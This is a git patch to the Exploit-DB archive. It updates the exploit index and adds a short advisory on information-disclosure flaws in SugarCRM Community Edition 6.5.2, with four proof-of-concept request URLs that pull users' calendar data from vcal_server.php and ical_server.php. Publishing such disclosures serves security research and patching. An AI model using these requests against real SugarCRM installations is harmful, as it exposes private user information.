From 756da2b8ccd4285e66c010b53ee46e103ffc9c1f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 26 Jul 2015 05:02:17 +0000 Subject: [PATCH] DB: 2015-07-26 1 new exploits --- files.csv | 5 +++-- platforms/php/webapps/37691.txt | 15 +++++++++++++++ 2 files changed, 18 insertions(+), 2 deletions(-) create mode 100755 platforms/php/webapps/37691.txt diff --git a/files.csv b/files.csv index b4a72db27..d36b1c98e 100755 --- a/files.csv +++ b/files.csv @@ -33995,12 +33995,12 @@ id,file,description,date,author,platform,type,port 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution Vulnerability",2015-07-20,"Eduardo Braun Prado",windows,local,0 37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection Vulnerability",2011-10-06,"Mr. Tokumaru",php,remote,0 37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 -37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Reza Espargham",ios,dos,0 +37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Mohammad Reza Espargham",ios,dos,0 37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS_ Android & Win 3.1.3 - Persistent Vulnerability",2015-07-20,Vulnerability-Lab,multiple,webapps,0 37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0 -37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Reza Espargham",windows,remote,0 +37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 @@ -34022,3 +34022,4 @@ id,file,description,date,author,platform,type,port 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0 37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 +37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 diff --git a/platforms/php/webapps/37691.txt b/platforms/php/webapps/37691.txt new file mode 100755 index 000000000..ba429083e --- /dev/null +++ b/platforms/php/webapps/37691.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/55347/info + +SugarCRM Community Edition is prone to multiple information-disclosure vulnerabilities because it fails to restrict access to certain application data. + +Attackers can exploit these issues to obtain sensitive information that may lead to further attacks. + +SugarCRM Community Edition 6.5.2 is vulnerable; other versions may also be affected. + +http://www.example.com/sugarcrm/vcal_server.php?type=vfb&email=will@example.com + +http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will + +http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&email=will@example.com + +http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will \ No newline at end of file